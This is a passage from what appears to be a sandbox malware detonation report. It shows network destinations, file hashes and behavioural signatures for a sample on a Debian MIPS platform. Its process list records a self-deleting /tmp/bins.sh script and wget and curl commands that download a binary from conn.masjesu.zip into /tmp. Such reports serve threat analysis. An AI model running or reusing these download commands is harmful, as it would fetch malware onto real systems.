| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
Files
/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB
| MD5 | 786d75a158fe731feca3880f436082c0 |
| SHA1 | 79ea2734e43d00cdeabed5586b2c1994d02aef3e |
| SHA256 | 5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18 |
| SHA512 | 7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f |
Analysis: behavioral4
Detonation Overview
Submitted
2024-12-05 07:52
Reported
2024-12-05 07:54
Platform
debian9-mipsel-20240226-en
Max time kernel
149s
Max time network
9s
Command Line
Signatures
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | /usr/bin/wget | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB
| MD5 | 786d75a158fe731feca3880f436082c0 |
| SHA1 | 79ea2734e43d00cdeabed5586b2c1994d02aef3e |
| SHA256 | 5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18 |
| SHA512 | 7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f |